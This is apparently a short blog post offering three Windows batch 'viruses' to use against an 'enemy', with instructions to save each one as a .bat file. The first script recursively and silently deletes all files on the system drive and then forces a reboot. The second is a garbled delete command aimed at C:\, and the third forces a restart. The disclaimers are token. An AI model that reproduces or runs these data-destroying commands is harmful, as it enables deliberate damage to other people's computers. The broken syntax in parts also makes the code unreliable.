3 virus for kill your enemy

Don't blame me, I am just sharing 3 virus to show that how the things can be done. Do not use it to your friends. Only use these if you want to destroy your enemy who make you worry.

Making procedure is same for all viruses. Write them in a text file and save them "anyname.bat"

Number one.
This virus will delete everything of a drive.
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Number two.
This virus can crush a computer without warning.
@Echo off
Del C:\ *.* y
Number 3.
This virus is not harmful. It will only restart a PC

@echo off shutdown -r -f -t 00
I am saying again that I am just sharing my knowledge. Use these viruses on your own risk.

No comments:

Post a Comment

Please help me to improve my English. Please Email me or comment below. Thanks...